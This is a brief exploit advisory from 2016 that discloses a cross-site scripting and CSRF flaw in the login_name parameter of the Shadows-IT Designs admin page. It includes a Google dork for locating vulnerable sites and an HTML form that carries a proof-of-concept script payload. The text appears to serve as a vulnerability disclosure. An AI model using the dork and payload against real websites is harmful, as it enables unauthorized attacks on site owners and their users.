###################### # Exploit Title : Shadows-IT Designs CSRF XSS # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.shadows-it.com/ # Google Dork : "intext:Powerd By Shadows-IT" inurl:?.php?page= # Date: 2016/02/12 # ###################### # Vulnerable PHP File : /admin/index.php # Vulnerable Parameter : login_name # Exploit : # #<form action="http://site.com/admin/index.php?page=bG9naW4=&op=Y2hlY2s=" method="post" name="login_form" > #<input class="EDIT_LABEL" type="text" value='"><script>alert(1)</script>"' name="login_name" > #<input type="submit" name="button" value="&nbsp;LogIn&nbsp;" class="Button" > #</form> # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################